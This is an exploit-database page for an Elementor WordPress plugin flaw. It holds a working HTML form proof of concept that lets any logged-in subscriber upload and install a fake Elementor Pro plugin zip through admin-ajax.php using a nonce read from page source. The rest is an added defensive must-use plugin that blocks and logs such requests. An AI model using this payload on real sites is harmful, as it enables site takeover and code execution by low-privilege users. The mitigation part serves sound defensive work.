## https://sploitus.com/exploit?id=WPEX-ID:DF62D170-C7D1-43A4-B6DC-20512934C33E
To get the nonce, log in as any user (such as a subscriber) and check the page source for elementorCommonConfig. The file to upload should be a fake Elementor Pro plugin zip.

```html
<body>
  <form action="https://example.com/wp-admin/admin-ajax.php" enctype="multipart/form-data" method="POST">
    <input type="text" name="_nonce" value="nonce retrieved from source (check elementorCommonConfig) of the dashboard when logged in as any user">
    <input type="file" name="fileToUpload">
    <input type="hidden" name="action" value="elementor_upload_and_install_pro">
    <input type="submit" value="Submit">
  </form>
</body>
```
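
The form above needs only a nonce that any logged-in user can read, so a site-level guard has to check the caller's capability rather than the nonce. The following must-use plugin is an added example, not code from the original page or from Elementor; the file name, function name and the choice of the `install_plugins` capability are assumptions.

```php
<?php
/**
 * Plugin Name: Guard elementor_upload_and_install_pro (added example)
 * Hypothetical location: wp-content/mu-plugins/guard-elementor-upload.php
 */

// Action name taken from the form on this page.
const GUARDED_AJAX_ACTION = 'elementor_upload_and_install_pro';

/**
 * Reject the guarded AJAX action unless the caller may install plugins.
 * Assumption: only such accounts should ever be able to upload a plugin zip.
 */
function guard_elementor_upload_action() {
    if ( ! wp_doing_ajax() ) {
        return; // ordinary admin page load, nothing to check
    }

    $action = isset( $_REQUEST['action'] )
        ? sanitize_key( wp_unslash( $_REQUEST['action'] ) )
        : '';

    if ( GUARDED_AJAX_ACTION !== $action || current_user_can( 'install_plugins' ) ) {
        return; // different action, or a user who may install plugins anyway
    }

    // Record the attempt for later review: user ID 0 means not logged in.
    $file = isset( $_FILES['fileToUpload']['name'] )
        ? sanitize_file_name( $_FILES['fileToUpload']['name'] )
        : '(none)';
    error_log( sprintf(
        'Blocked %s: user_id=%d ip=%s file=%s',
        GUARDED_AJAX_ACTION,
        get_current_user_id(),
        isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : '-',
        $file
    ) );

    // Sends a JSON error with HTTP 403 and terminates the request.
    wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
}

// admin-ajax.php fires admin_init before it dispatches wp_ajax_* hooks, so the
// earliest priority here runs ahead of a handler attached to either hook.
add_action( 'admin_init', 'guard_elementor_upload_action', PHP_INT_MIN );
```

The `Blocked elementor_upload_and_install_pro` lines it writes to the PHP error log double as a detection signal for low-privilege accounts attempting this request.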